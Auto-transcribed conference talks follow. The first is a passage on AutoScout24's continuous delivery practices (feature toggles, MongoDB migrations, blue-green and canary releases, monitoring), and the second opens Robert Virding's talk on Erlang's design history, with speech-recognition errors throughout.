certain set of data When the features off the partial is simply not shown. So the garage doesn't even know that the data is there and can be added What do we do here? We have an additional if in the code So we basically branch an additional time the code and we do branching in in the code instead of source control So it's still a branch, but it's all in the code base and it makes it easier to handle This is a very simple example Of course you can imagine more complex ones where you might switch out an implementation of an interface for another So feature toggles give us the possibility to develop Features in the background without neglecting continuous integration. Of course, they're no silver bullet and we've had our problems One is that in the code you just saw in the configuration code This is by definition untestable because it's different in every environment and in the beginning we had a separate setting for the acceptance test environment and of course we tripped over that on acceptance test environment It worked when live boom didn't work So now we have just one setting and the acceptance test environment takes its setting from the live setting Not all changes can be handled this way, but it works quite well for us And feature toggle switches flippers come with an adrobic What maybe whenever you add one increase the complexity of your code structure So keep in mind there's a key to key takeaway Monitor the number of feature toggles you're using and get rid of them when you don't need them any longer So this is a example how we do it at good if I would just keep track of our feature toggles in a list That summarizes the name of the toggle created it when it was created and whether it can be deleted or not indicating Yes, oh no So keep track on that and make sure you you you reduce the complexity of your code once you don't need to toggle any longer Okay, so it's nice we can switch our application logic back and forth, but what about the data If you change the structure of your persisted data, it doesn't work that simple Like adding fields or changing names in the database is something different now Traditionally use relational for relational database. We use update scripts. We do that too for our Oracle database But we had quite a bit of pain with that now the pain has reduced somewhat since we started giving Responsibility for database updates to the development teams and now that we're releasing more frequently with less changes in every release But the pain still remains So when do you actually run these update scripts before you put the new code on the service on the web service or after or during? Or you need a downtime when you run the update scripts Do you and have dependencies between them and have to run one after the other in a certain order? To avoid all these things when we started with the garage portal, which is our younger product say We decided to use MongoDB. Who's heard of MongoDB? Okay, who's actually using it? Okay, then I say two words about it MongoDB is a document database. So it does not have tables. It has collections instead and a record is basically a JSON document in such a collection the data inside a document is a hierarchy structure and The interesting thing is that all the documents in one collection can have different structure So it's very flexible in that and we've chosen this flexibility explicitly to ease continuous delivery and in this case it actually worked Let me show an example for this So what we do in the garage portal is we basically serialize our domain objects into documents in the database so we'd have a Document in the garage collection with all the data of one garage in it when we load the data We basically deserialize it into a CLR object Now bear with me through a scenario we wanted to make Garages be able to offer additional services free services with what they offered on the platform So for example when you leave your car with the with the garage to have some service done on it they would give you a replacement vehicle free of charge and To display this online we added a field to the garage domain class Included services. It's called now the documents already in the database didn't have that field So what we did is added this function to the data access code and It's called every time a garage document is loaded For those of you who don't haven't worked with MongoDB Beeson document is the binary representation of the JSON document in the MongoDB API What happens in this code? I think it's simple enough to figure out even if you're not familiar with C sharp We just look is there an Already an element included services if not the element is added That's all if the element is already there. Nothing happens So when a garage logs on The document without the field is red It's added through this code and whenever the garage saves its data for whatever reason The street the new structure is persisted to the database Now again, this is a simple example, but of course you can imagine more complex scenarios So what are we doing here we've created backwards compatibility The application can read the old and the new structure and it always writes the new structure and This is possible because we can have documents with different structure in one collection And We do not have any operation interruption we do not have to run The script manually This all works on the go now not every garage will log on within a limited amount of time and In the end you want all your documents to have the new structure So at first we still wrote update scripts in JavaScript because that's the language of MongoDB and we run them Random in the end which doesn't need downtime But still we had to run this update script and we had duplicate logic one in C sharp that we just saw in the other one in JavaScript and we didn't like that and what we do now is At night when there are a few users on the platform We just load the whole database into memory and save it back again So that every collection runs through the code we just saw and the next day all all documents are in the new structure We can delete the migration code So I like the picture of the two-headed snake because it gives me the idea of this Creeping migration that you don't really notice and it has two heads so that he can eat both versions And they end up in one stomach So far with So far we've heard about condition integration future targets on how to deal with data Here's another key learning to us It's about automation Automation for sure no doubt about that is key If you want to get to the stage that he be able to release continuously Even though our fixed build was automated our leases still took long The build the test the deployment now automation came into play For example, but provisioning of environments testing deployment building and Making sure that the same config is deployed on any environment, but is this all? We didn't think so So even though the build was automated think I think there's a question. Oh, yes up there is a question This one Yeah, I'd say there's no recipe for that, you know, you'd have to think about it and and I mean establish how you How you proceed in in that case? So I can't give you an answer we'd probably do it in some way every time but The thing is this works for the most common changes so we have a lot of changes in in the front end and Little features that we try out and then we see like a B testing see what works best for bigger changes You probably have to put more brainpower into it. Yeah Did it answer it in some way? Okay? Okay, any other questions? Okay Don't continue with our build system So the obvious solution to us what let's invest in Hardware to buy new build machines that allow for parallel builds Well, it was a good idea and we got faster. Yes, but at the end we realized that there was another even better solution why not stripping our build systems down why not get it leaner and Getting our code structure less complex make it simpler and that's even compiling the whenever you try to automate things make sure You keep your code as simple as possible Well, that's a story that's cool, but now it comes to a crucial point Releasing and remember we did not want to be offline when releasing and there are two different scenarios One of them is the blue green deployment. Has anyone of you ever heard of blue green deployment? Okay couple of hands showing up so the key point about blue green deployment is that You split your web service into two different pools and they are online the same time If you're not releasing whenever you release the load balancers to manage that the one the first one Let's say the blue one Is taken offline while the green one is still online and new code is deployed on the blue half of the pools being tested and Being taken on again again managed by the load balancer and as soon as the blue half is on and again with a new code The load balancer again manages to take the green one the other half offline Bring the new code structure on it and take it on one again Following this simple principle you may not be offline while releasing The most crucial part in this scenario is make the load balancer orchestrating these changes But there's another one you could try Simon Okay, just to repeat the question is how do you go about databases with blue green deployment of well I've heard about I've heard of people talking about blue green deployment for databases. We haven't done it I don't think it's really good scenario. So we decouple these things doing separately. So this is for web server deployment The So the question is do you use it also for rollbacks to see whether it works live and what do you do when you have database changes included? so First question rolling back. Yes, of course So the idea is that while the blue server is the blue pool is inactive You can actually test that and see if it works live and then roll back to the old version if you see that it doesn't without Impacting any users the other question about database changes is I believe it's a very good idea to actually decouple your code changes from your database changes In that you keep as we saw before the code Backwards compatible with new version of the database or with the old version better So you can decouple these and you don't have get into problems when you do bleak blue green deployment that you also have database changes interrelated Okay, there's another one I don't see how that works in your case next time Yeah, okay, so the question is What crap are you talking you just showed some code where you actually write new data and you can't just switch back to the old version I suppose that is correct. Yeah, of course when you write new data or new when you write it in a new structure Then you are being sort of destructive about your data so if you want to Be back what's compatible here Then you'd probably have to have an intermediate version where you write both versions like say you rename a field you still write both fields the the old name and the new name and Then only when you see that it's working alive and after some time to remove the one with the new name I'm pretty sure this doesn't work for every scenario So blue green deployment is good if you have a lot of changes in the front end Which don't really go into the database and you have to think about it when you do database changes, okay? There's another one up there So the question is if I got you right is do you do backups before you release or what other? Rollback strategy do you have that correct? Okay? Well? We do not actually have a rollback strategy. We do only go forward So that is the idea taking the risk of not being able to roll back Which of course means you have to have high quality all the time I'll get to that in a minute and the other thing is of course we do backups But not before every release so we do backups regularly I think every night and if something goes wrong And we have to go back to the backup then we'll have to do it, but it hasn't happened in a long time Okay, we can take more questions at the end I suppose Now another thing maybe to be honest is we're talking big about blue green deployment here And we say I've been doing that for years and just a few weeks ago. We actually discovered that we always had Exceptions on our live servers when we when we did deploy and then we found out that we still cut off connections because we just told load balancer to switch hard from one moment to another and We found that out only recently so now we're doing it more intelligently where we wait for connections to actually end and then We switch over to the other pool So you have to be intelligent about all the stuff Okay, we have feature toggles and we have blue green deployment now we want to go one step further why? What we're doing is we're still doing a big bang release when we switch a feature toggle on because the whole code that is behind the toggle Which can be quite a bit when you have big changes goes live to all users at once And we still need to deploy when we want to switch a toggle What we want to do is use virtual cannery birds in the old days of cold mines cannery birds were used to detect poisonous gases in the mines and The poor birds would fall to the ground before the miners even noticed that there are toxic gases in the air and So they could run and they saw the birds on the ground This gives a name to deployment strategy of canner releases where you switch new features on only for a few users and you observe the And when they fall dead to the ground you better switch back to your old version and when they are happy then you can go on And release it to everybody else What we also started doing is Writing regression tests for both branches so for switch on for switch on and off so that we can actually have both versions live without risk And we want to separate the code release from the feature release so that we can switch between the two versions The feature release so that we can switch between without deployment and the idea is to go so far that the product owner can actually go to the live service switch on the feature only for himself Do acceptance and then switch it on for the desired group of users or for everybody? So to start this some clever colleagues of mine have developed this thing called feature be it's basically a central management of features You can view and change the feature status So this is an example screenshot The first column would be features that are in development The second one is the switch the features that are switched on for the canneries And the third one is active for all users. So they're basically done live for everybody To select the canneries you have certain filters They can be filtered by country or by browser browser version or you can assign it to a percentage of users So this goes also towards a B testing There's also a browser plug-in where you can switch on feature just for yourself so that you can see for yourself It works or not. This is open source and on GitHub. It's implemented in net but of course we welcome contributions for other platforms Here's another example screenshot I'm at code a flag of it currently migrating or back and to go for Scala services and they're deployed once The developers commit their code into the mainline and this looks pretty much like like this for example with this Service common service as long as the background color of each of these services is green everything's fine We're neither turn orange or red there's problems behind that and the signals where to just check on that single individual service To get it fixed and run the deployment again It's our visuals to realize when everything is not running smoothly It's as easy as that, but you have to keep in mind to realize The point something happens with your tools Okay, so we're developing in several teams on a code base. We have Different features in one team in development Excuse me at one time and want to release at any time So we do not have a lockdown anymore or code freeze and we do not have a phase where we can check the whole platform and see that everything's working and Yeah, we also have we don't want to do rollbacks anymore. So we always want to go forward so this all Requires continuous quality as well. What does this mean for us? It starts with pair programming So the two teams that have been working on the garage portal have a lot of That have been working on the garage portal have developed all production code in pairs from the beginning and This not only means for eyes for high quality but also included know-how transfer and we really discovered the fun of working this way and Pair program also has another advantage over the classical code review so when you do work in the in the way of Developing committing and then doing the code review the code might always go live between the commit or the push and the review This is the testing permit Supposed to show what we test on what levels the goal is high automation, of course to have fast and repeatable feedback The width of the permit shows the automatic coverage and of course we use TDD so that no code Is written that is untested On the lowest level our units and small component tests which are supposed to have a very high coverage, of course Then we have regression tests which test only our main use cases But they also run continuously so that we have always know how the main use cases are doing and so what so far We've been using browser tests for that. So Selenium Which you've had quite a bit of pain with in the sense that the tests are slow because they run through browsers and through network and Because we have quite a few brittle tests flaky tests that are read although the functionality is actually working correctly So what we're doing is we're trying to reduce the number of tests we have remove the ones that are actually testing duplicates and Also go to a lower architecture level where we test directly the business logic or the application logic instead of going through the browser all the time Next level would be smoke tests So this is a part of the regression tests that are only the most important functionality that we run after every delivery So that we know okay whenever we delivery to an environment It's actually still working one example would be that in the garage portal We always had problems with sending out emails So now we have a smoke test that after every delivery says okay emails are still working because this very important for us And above the pyramid without automation you still have manual regression and explorative tests Because no automation can substitute the intuition of a human and our test is no pretty well What areas of the code are very critic what has changed and what the what the coders usually break We also have these friendly gentlemen we call them the cops after the static code analysis tools style cop fx cop resharper We all but you also use json for JavaScript Well, there's a tools for checking formatting and common errors and bugs We also respect compiler warnings and treat compiler warnings as errors It's all very annoying in the bidding in but once you get used to it you have the advantage of having A uniform formatting so you can't really recognize who has written which piece of code although developers have all their different styles of coding And of course you avoid bugs from the beginning Failures oh there's a question The question is when do we run the static code analysis is that correct? Okay So I would say the actual continuous integration happens on the developer machine So before you actually commit you would run unit tests and static code analysis so that you know at once if you've broken any of those And of course it's run again on the continuous integration server But it's actually important to have the feedback as quick as possible. So it's you could even run it. I think during coding time But it's actually important to have the feedback as quick as possible. So it's you could even run it. I think during coding time But it's actually Compiler unit test time Okay Okay, so let's give it a try again Failures are of course Great chance to learn to get better next time and whenever a failure happens to a website you do like this It is point the entire team stands up and gathers at the rubble that's located in our floor and Asks three questions and the answer it as well. What happened? What's the impact? to takes care and When do we need again to check if we were able to fix it? So that's part of our ownership. It's the teams Who deliver software it's the teams who do it doing the releases? and even after that little And getting it fixed again together again to ask five questions five times y in a row Why why why why? why To find out on the root cause of this failure So it's just that it's all about teamwork and once upon a time We had a release manager orchestrating a big huge release task force to do our monthly releases And for us This has become a fairytale Because it's not teams who are in charge of releasing each each team is able to ship its software independently from the other teams and We managed to improve our releases from five weeks to a commit to life in less than an hour and As Jimmy just seem as I'm just pointed out We don't know we do not have any rollbacks. We only go forwards with roll forwards So this is annoying Yes, it is but if it hurts do it more often and you get trained to it. That was our mantra back then and So we did There was another learning When we achieved continuous life delivery we learned a lot about flow about improving flow Visualize impediments and get rid of them and that's why we Try to implement Kanban with a couple of teams instead of scramble and Nowadays we don't do not have teams that follow scramble book No, do they follow Kanban body book they do anything in between? You'd like to call it scramble, okay? But we realized that whenever you try to improve any kind of flow There will be impact on other flows as well Okay, so to show you that we're not inventing things this is a screenshot from the being of the week It's the live delivery build still team city of The garage portal that I was talking about So what can you see here? You can see a few things You can see for example that right here. We had a gap of what is it? seven days of Delivery, so of course you can ask yourself. He's talking about continuous delivery is this continuous delivery You can see here a live delivery broke, but we actually fixed that An hour later. Well, no, it's actually what is it? Well a few minutes anyway? This is like more the roll forward scenario Try to fix it quickly be able to fix it quickly so they don't have to go back What else can we see? There's one day 28th of April where we actually went live three times a day So that's possible too. Now, of course you can ask is this continuous delivery? I don't like the big break in there either probably we were doing server patches because unfortunately We don't have that included in our delivery pipeline yet So it could certainly be a lot better and there are still quite a few things that can be improved for us It is important to be able to go live when we want to Now what can still be improved what are we working on? Autoscar 24 turned 15 years last year and the vehicle market is a big application that you often have in these cases a big monolith and And it's used to be released in one big bang as we heard before which of course prevents teams from working independently and releasing independently So what we're working on is splitting up this monolith in separate components that can be developed and released independently and that Single teams can take responsibility for of course you have to watch out it's not all done by splitting it up into a separate code base and Pulling up a release pipeline for it. There are of course hidden dependencies and you have to figure them out and manage them and We've tripped over a few of them, of course Another thing is DevOps so we've been working in interdisciplinary teams But operations is basically still a separate department and of course ops and deaths have by definition different interests so developers want to change as Much as quickly as possible and ops want to change as little as possible of course because of the stability of the platform But our goal is to have one team responsible for release and operation of their product you build it you run it and Of course that needs competence on the team for server configuration automation monitoring and all these things What we have now is one developer in the team has a devop role so he has additional rights to the live platform and Act as a link to the ops department What is missing is that basically every developer has that role and has the rights to deliver but also the obligation to watch out and to To monitor and to run the thing So let me tell you a long story About our so-called user sign-up back users of users Can sign up on our page for free. There's no charge and so do about 10,000 users a day but several weeks ago About 10,000 users did so signed up and we have not been able to sign in after signing up So what happened? The data the sign-up data was written to the database check but unfortunately to the wrong table and Even worse we did not realize because back then we only monitored operations data operations KPIs like bugs lead latency performance And it took us very very long hours to realize that there is a big important back life on our platform So team were blinded they did not check after they released if users will be able to sign in after they signed up Today we do have screens to look like this That show business KPIs like in this case the correlation of sign-ups and Sign-ins And we could have realized this bug way earlier if we had had that TV screen that correlation of sign-ups and sign-ins Some monitoring is not only about operations data It's also about business and business KPIs to find out if something happened after you released on your platform And it's crucial It's crucial if you want to release frequent as often as possible whenever it's done whenever you want It's just about flow just about getting things to your customers again again And again, okay Anymore questions Yes, please yes Yes, so you you talking about the Ios one are you yeah Continuous delivery, okay, so the question is You we also have an app on iOS or Android to how do you do continuous delivery for that? Well, you can't really do it. I mean In Android, I'm not so sure you can probably deliver quite fast, but to get through the Apple iStore is is It takes a few days at least So you can't really deliver to your users few times a day But you should still be able to respect the principles behind it so continuous integration and always be able to deliver and do a roll forward And these things It's indeed a bit faster with Android, but you can't deliver any app when you want that's true any other questions Yes, there's one over there on the right hand side I Actually not that I would be aware of so I always ask We were asked to just blog about it, but to be honest Good point. No, yeah, would you prefer? Yeah, we want to start the blog to share more of our learnings, but we haven't done so far so I'm afraid I can't really tell you anything about it Any other questions, but I can give you my card and you can like ask me directly afterwards or via mail or stuff. Okay. Yes, there's another one I Just I'm gonna guess that's yours the questions about how to deal with caching. Yeah, so the answer is basically we are crap at caching So that's why we're not talking about it But thanks for asking yeah Any other questions Yeah, there's one on there Okay, the question is do you use apps or something you load balance them and blue green deployment deploy them So in apps or was you mean like running background services? Yeah Yes, we have them No, we do not blue green deploy them Why not it's probably because we can just take them offline and start them up again and no user would have any impact That's for the most part of it Okay, more question. Yes up there and down there afterwards Nice you Yeah, so There's sort of a process where we'd say okay, we want to go live now This is might be handled different in every team, but normally during the stand-up in the morning say okay, we have to go live as soon as possible and a developer or a tester whoever would push a new version to the acceptance test environment and look over it and he would know because he's working with the team what has changed and He might either say okay I have seen all the regression tests are green or check a few things manually and then say okay This is ready to go live so there's no hundred percent sure that everything's working but the idea is working closely together and knowing all the time what's going on and What we also do is when we have a Acceptance test environment that is green in the sense that all the regression tests agree and a tester has said okay I've looked over and it's fine. It automatically goes live Does this help that looks like I'm facilitating your questions now Okay, the question is for the tooling for the deployment so what we use is team city rake and I think rake also starts some PowerShell scripts What else is there to it, but there's nothing else where we used to Have an archaic tool called was it called Refleweb, I don't know if anybody has a word that was a big pain in the thing and we got rid of it as soon as possible after the One who really wanted it left the company Okay, yes, I guess one last question Yeah, okay the question is how much time you spend Okay, the question is how much time how much time have you spent on On implementing all this Yeah, that's a good question. I Tell you a lot a lot at least that you do mental cast and to motivation and to just Just get it done in terms of investing the time but in terms of real cast So I mean, do you need anything any number any figure? No, I think it's really hard to tell Yeah, yeah, okay Okay, so as all of this is part of developing getting a story done, I guess but that's only a rough guess it's Around 25 to 30 percent per user story, which is about Depending on the size of a story up up to Three to four days, maybe only hours But if you're talking in terms of investment that you have to take to get this I think you actually save time because before we had one week of release and We wasted one week of time basically so now this is all faster and as soon as it's gotten to people heads and into the process That they have then you're actually faster and you save time. It's quite a good example to show that it pays off later in the day Okay, there's one last question up there. Yes, so and the question is how about Big architectural refactorings and branching so yes, we do still avoid branching We try to split it up in little chunks that can go one by one So we might do branches but only for trying things out locally and then we do not merge them back But we avoid branches at all costs basically now, of course we do have architectural changes and the splitting up the monolith that I was talking about this is a really big architectural change and Of course you when you have these big things you really have to think about them And you can't just say okay put a feature toggle and a migrating serializer and that's it You really have to think about them and you have to plan them ahead and you have to split them up in small chunks That's all I can really say in a general way about it But if you want to discuss a specific scenarios feel free to come down afterwards and we can we can see what we have Experience so I guess Simon we would be happy to I think we have like three more minutes to take questions. Yeah, that's right Yeah, that's right Yeah, up there Question is monitoring tools. What do we use you want to give an answer for Most of them with us are self-made Just can't remember the name of the tool, but it may pop up in a second. How about out of Scott? We try not to use well, we try not to build our own so we have Splunk running But we're not very happy with the monitoring solutions we have at the moment So we were actually basically looking for for stuff that works that works better. I think we have PRTG PRTG and then we have something else, but I think we're on our way to finding something else I can't remember right now, but we can check after presentation if you're interested But I think you should be able to find stuff that is widely used and adopted and they can good plugins and Visualization for without building stuff on your own might have built some plug-in to to probe some stuff in your database So that you can display that but that's all Yep Okay, so the question is what do we think is important to monitor is that correct So I think the most important thing to monitor is really what your business is about So as Robert just showed earlier if it's important for you that users can actually sign in and sign up Then you should monitor that and you should really be aware of it all times. So we do not monitor values like Is a value in a database correct or our service up or is a certain thing running correctly? It's more important to actually have your your business KPIs when you view because then anything that breaks those really means Okay, you have to take action. Everything else is really like second priority Okay Any other questions Any more questions about caching or stuff Stuff we did not talk about I know nobody's perfect. So Things or blogging I don't know maybe expose us in some other ways. No, okay We can have lunch together if you want and thanks for listening and for the good questions and enjoy making your supernova small predictable You
We want feedback - fast and often. This requires quick and frequent high-quality releases. But how do you do that with a platform that 10 teams are working on? Can you do without branches? How do you keep up with testing? And database changes...? This is a look behind the scenes of AutoScout24 - a pan-European online market place - that makes continuous delivery possible with agile methods.
10.5446/50632 (DOI)
Okay, it's time. Shall we start then? Yeah, so I'm Robert Wedding. Thank you, the fan club. Yeah, I currently work for our Lang Solutions. We provide training and consulting around our Lang, the language our Lang and building system with our Lang. I was originally a theoretical physicist and the physics at Stockholm University and the physics department, they got their own computer and seeing I was postgraduate, I had more or less free access to that. And after a while, the physics department, I decided I should go do something else because I wasn't doing any physics. Doing a lot of programming though, but didn't like no physics. So I started working for Ericsson, originally for a small group managing Ericsson's Vax VMS computers in the Stockholm area. That's how long ago it was. Then I started working in, again in Ericsson in the computer science lab, where amongst other things, we developed our Lang. So we were trying to do a lot of things in the computer science lab and actually trying to introduce new technology, which we thought would be useful for Ericsson. So that's where this, most of this work was done. The name, the title, Wherefore Out The Lang, that's of course a play on Shakespeare and wherefore does not mean where. It's old English and it means why. If it's speaking Swedish or Norwegian, it's Varifur. Why Lang? Why are you Lang? That's what I'm going to try and explain. A bit of a rich start off with about concurrency versus parallelism. There are a lot of definitions about what is concurrency and what is parallelism. Some people equate them, some don't. I prefer the view that parallelism, that is something your system provides. That gives you a possibility of doing things at the same time in the system. It's multi-quarter where many nodes or whatever it might be. Whereas concurrency, that's a property of either your problem or your solution to the problem. They want to divide things up in little bits that communicate with each other. One does not entail the other. You can of course run a system that's very concurrent on a non-parallel system where you can run extremely sequential code in a parallel system which of course is way too time. There's a lot about parallelism and concurrency. So we'll start off with just a little bit of history. One of the things we were doing in the lab was trying to help Ericsson solve a problem. We perceive that they had a problem. They had a switch called the AXE which was a very good switch. There's nothing wrong with it and it made Ericsson a ton of money. It was a very successful product. But it was costly and it was difficult to maintain. So one of the things we tried to do in the lab was to look at this and how can we simplify the cost of development and the maintenance of the AXE. That is actually a real picture. That's what telephoning exchanges look like back in the old days when you had wires. I think you got to have an exchange that might have 100,000 connections coming in. So you've got 100,000 wires at least coming into the system going somewhere and you get enormous things like this. How they keep track of them might have absolutely no idea. I know that you seldom moved anything. They put in a new cable instead because they're never really certain where the other one went. Anyway, that's the problem. So what's the problem domain? What are properties of this problem? This list is from our boss in the lab, Bjornedekker from the thesis. And there are a number of things that are typical of this type of application, telephoning exchanges. And some of them are quite natural. For example, the bottom one here, we have to have a large number of concurrent activities. And we were sort of thinking, large telephoning exchanges where you might have 100,000 of connections coming in. So you might have 10,000 of calls going on at the same time plus other things going on in the switch. That's why I thought it was so funny a few years ago when the C10K problem came up and how do you solve the C10K? That's something we'd been considering as a small system when we're starting to do this work about 20 years ago. Until you get to 100,000, not really interesting. Anyone can do that. You have other things like, well, you have timing constraints. Things need to be formed at a certain time and shouldn't take more than a certain time. You need distribution. We'll talk a bit more about that. If you want a fault tolerance system, you need at least two computers. So you need some form of distribution mechanism in the system. It's got complex functionality. You need software maintenance. The system should not go down. You should not have to take the system down ever. That's the goal. The goal is you buy it 30 years late, you run it for 30 years, then you change it afterwards. And any maintenance you need to do, you do while the system is running. You should not need to take things down. Fault tolerance. Again, you should not need to take the system down, but the system should never crash. You're going to get errors, just accept fact. You're going to get errors, but the system should be designed in such a way it can handle errors, recover, clean up and recover from errors afterwards. So these are a lot of the properties of telephone exchanges and this was the type of application we were looking at. These were our goals. How do we design a language or a system for doing this? This is me, hard work. Actually, this is work. Two things. If you look at the middle at the back there behind the screen, you'll see a small box. That was a small exchange of PABX we had in our lab which we could experiment with. So we had hacked that and we connected to our Vax computer so we could control that small exchange from the computer which means we could experiment with controlling, writing telecoms applications on our major, major, large computer and actually run them against the hardware, which was quite an interesting experience because the hardware does funny things and requires funny things occasionally. So we had to get it right. The train set, that was for an exhibition. We were going to take part in. So for one week we were going to stand there and try and present our link to people and we wanted something. How do you get people interested enough to come and look at what you're doing? And whatever you might think of that little telephone exchange at the back, it's not very interesting to look at it right. I think it had one light when it went on when you turned the power on. That's it. It doesn't blink, it doesn't do anything. So we thought a train set. So we had a, it's a Maclean train set and we're actually controlling it from our link. So we had a small 8 to make a train control system which you could run trains in and it would stop things and everything like this for it. It was actually very fail safe because if something went wrong it just stopped everything. So never any crashes on it. Yeah, that's that. This is about 91 I think it was. Somewhere around there we were doing this. I've actually still got the software left. Bits of the train as well too. Yeah, it's a bit of philosophy about what was going on here, right? What we're trying to do and how we're thinking. And I think the couple of reflections we made. So our link was developed iteratively. We had this goal, what we're trying to do. It was Joe Armstrong sitting up the front here who started it and say how do you program telephony? How do you set up calls and things like this for it? We start off running this on top of Prologue which is very sequential. So you can set up a system for making calls and then you can make a call and that's fine. Then of course you want to make two calls and three calls and four calls etc. Then you start having to get into thinking how am I going to do this concurrently, right? How can I program this in a nice way to get the natural concurrency in the system? So then you start working on this. And this was developed very iteratively. We had a user group who were in another part of Ericsson and they were doing an architecture study and they wanted language to prototype their architectures in. So we started working together. We sort of provided a language for them and they came back with feedback on our language. On how good and how bad features were etc. etc. like this. And it was a very successful collaboration in that sense. But some things that are important to note here, we were not trying to implement a functional language. Our language is now a functional language. That's been, well since it more or less was complete, but we were not set out to implement a functional language. It became a functional language. We start off as a logic language. It became a functional language in the end. We were not out trying to implement the actor model. Okay, so we found out later, at least I had never heard of the actor model while we were doing this work. We found out later someone said, yeah, oh, how long it implements the actor model? I said, oh, yeah. So I go out and try and find out what the actor model is. And yes, it does. It does implement the actor model. And yes, it is a functional language, right? That's not where we're going. That was not our goal with this way. Our goal was this. We were trying to solve the problem. So the focus was on solving the problems, designing a language and a system for programming this type of application. That was the goal of the whole thing. It became functional. It became, well, the actor model. Because these were ways we thought were very good, very good ways of trying to solve this problem. So that's why we're doing this type of thing. Also, this was actually very good in another sense that it kept the focus on what we were trying to do. So we were trying to solve this problem. We weren't trying to implement a cool language. We were trying to solve this problem. And what happened was that our ideas went into making the language. We then got feedback if there were good ideas or bad ideas, how they needed to be modified, et cetera, et cetera. We put things in which we found afterwards were totally useless so we could remove them because they weren't trying to solve this problem. And so we weren't trying to implement a cool language, design a cool language, try to make a language, and a system to solve the problem. I think that's very important when you look at our language. It also makes it much easier because you can sometimes, well, avoid a lot of crap that comes in because people think it's cool. Yeah, it might be cool, but it wasn't helpful for the problem. It went out again. That's why, for example, the language, one reason why the language and the system are very small. Yeah, as we were developing the language, we arrived at a number of basic principles and requirements of a system for doing this. So the language itself, yes, but it was also a system. It wasn't just a language. It was about the whole system, the libraries, and the environment for working and everything like this. And we had a number of features which we felt was necessary for that system to be able to handle. Otherwise, it wasn't interesting. So you needed lightweight, massive concurrency. That was just a base requirement of the system. You're running processes, you need process isolation. Things are going to go wrong. Processes are going to crash. If a process crashes, it cannot affect another process. That's just it. I mean, you can't have it like this. So here we're talking processes. We're not talking threads. Threads interact with each other. They can affect each other directly. Processes can't. You need primitives for handling fault tolerance. In the same way as the concurrency was a fundamental part of the problem, so was the fault tolerance. If you could not build a fault tolerance system on top of this, it wasn't interesting. That's it. You needed primitives for doing continuously about evolution of the system. You had to be able to handle, for example, not just change the configuration, but even upgrading code while the system was running. So you needed primitives for doing this. You needed primitives for distribution. As I mentioned, if you wanted to make a truly fault tolerance system, you needed at least two computers, which means you have to have some way of handling distribution of the application, the problem between these computers. That's just all there is to it. Soft real time. So in the telecoms world, yes, you do have these timing constraints, but they're not hard real time in the sense that if you run over occasionally, it's not too bad as long as it doesn't happen too often. So that's, we call this soft real time. Real real time people don't call this real time. For them, if you don't do something in time, it's an error. We'd say, yeah, just as long as it doesn't happen too often. We want a safe language. Safe if we're comparing to say something like C, where you've got, we can just do pointers, pointers are often to hell somewhere and crash the system. We want a simple language. Simple in the sense that you have a small number of basic principles which you can build on top of. You don't want to have 50, keep adding new stuff at the base level all the time because you need something else. It means you got it wrong. So we want a small set of basic principles. And if you get them right, you can make a very powerful language which is simple. So in this case, small is good. And I think that's one of the things we've actually managed to do. We'll see later the basis in the language are very, very few basics and they're very simple, but with them you can program very complex systems, very complex functionality. Another one we found was that provide tools for building the system, not solutions. And that was just, if you tend to provide solutions, they're either very limited because you're providing for a specific type of problem or if you want to make something that's very general, it becomes extremely complex, lots of different options and parameters and stuff like that and basically it's very difficult to use. And we also found that when we did try to provide solutions, we usually got them wrong anyway, right? Because either our view of what the problem was just didn't fit in with reality. So provide the basic tools for building things on top of the language, in the language, and let people build the more specific cases in their application. It also allows them to handle different things in different ways, even in the same application, depending on exactly what they want to adjust at that case. So these were things that came out of our work when we were working with Alling. Yeah, so where do we end up? So what's the Alling way in this case? I'm not going to give that much code examples here, but many. So there's a functional language, well, sorry, there's a sequential side of the language and it is a simple functional language. It truly is. The syntax is yet different, but most functional languages have different syntax. Whether you're programming Haskell or programming Afsharp, the syntax is different. And you're always going to get complaints that why doesn't it look like something with the typical uses semi-colons and curly braces? That usually just doesn't fit. It's a safe language, yes, no pointer errors. It was reasonably, it is reasonably high level, actually, was then and still is in many ways. It's a simple functional language with a lot of stuff in it. It's dynamically typed. There is no static type system. It's strictly typed, but it is dynamically typed. All type checking is done at runtime. This was partially where we came from and also because it makes dynamic co-loading easier. And there are no user defined data types in the system. There are a fixed number of data types you can use to build things with it. Again, this also reflects back to dynamic code handling. If you had something like dynamic code handling, you might have to define new types in the system on the fly while the system is running and everything else might have to be recompiled to fit those and that would just not work. So, yeah, and typical features of the functional language, yes, it's immutable data. Again, this is standard fare for most functional languages. It's immutable data. We have immutable variables, so our long variables aren't. They just reference the data. We use pattern matching everywhere. Pattern matching is different, but it's extremely practical way of doing things and makes very nice, concise, and very clear code. And we don't have loops so recursion rules. That's just it. Nothing strange. Again, this is nothing strange. So this is one of the two syntax examples I've got here. So, yeah, we're using pattern matching. These are just two functions that step down over lists. And you'll see here the top one, the ink list, that takes a list of numbers and returns a new list where it's incremented every element of that list. And you can see here it's in two parts. They're separated by a semi-colon. I don't have a pen here, I'm afraid. They're separated by a semi-colon and they're two separate clauses. And we're using pattern matching in the head, a bit on the left-hand side of the arrow, to choose clause. So if we're saying the argument is a list with an element, we take the first clause and pull the list apart. And we build a new list and call ourselves recursively to process the rest of the list. If it's not a list, the element is at the empty list. Yeah? If you have like 100,000 entries in the list, will that actually allocate, you know, 100,000 lists? It rebuilds a, it completely rebuilds the list. Oh, wow. That's fast. Yes. It's fast. You want it. Trust me. You want it. You want immutable data. Immutable data solves an awful lot of problems, right? Shared data is evil. You want immutable data. Yeah, so this is just stepping down the list. And the same thing with a member. That just tests if an element is a member of a list. And you've got three cases. Yes, the list has elements and this is the first element. Therefore, we say true, yes. If it's not that, we check the rest of the list until we've hit the end of the list and we say false. So, yeah. The thing here is, if none of these clauses matches, you get an exception. Okay? There are no default values, no default case or anything like this. You get an exception which crashes things. That's good. Trust me. That's good. This is done by design doing this. We have a few other fun constructs in. I like this one. Binarys. So we have a binary data structure. A binary is just an array of bytes which, of course, is extremely unsexy. It's about as uncool as you can get. But the interface is very nice. We have this interface that allows you to access to build and access elements by declaratively specifying what this structure looks like. So this structure, this binary structure here between the double arrows, describes an IP packet. So we say the IP version, that's four bits. There's a four-bit header length version. There's an 8-bit service type. There's a 16-bit total packet size field in that. There's a 16-bit ID field. There's a three-bit flag field, et cetera, et cetera. We're describing what this packet looks like in a declarative fashion. Yeah? The constructs for creating a syntax, is that built into the language or is it macro-based? This, the question was whether this syntax is built into the language. It's built into the language. This is a built-in data type in the language and they're constructs for building them and matching them and pulling them apart. And this syntax here, that can both be used to construct a packet, a binary packet. So put on the 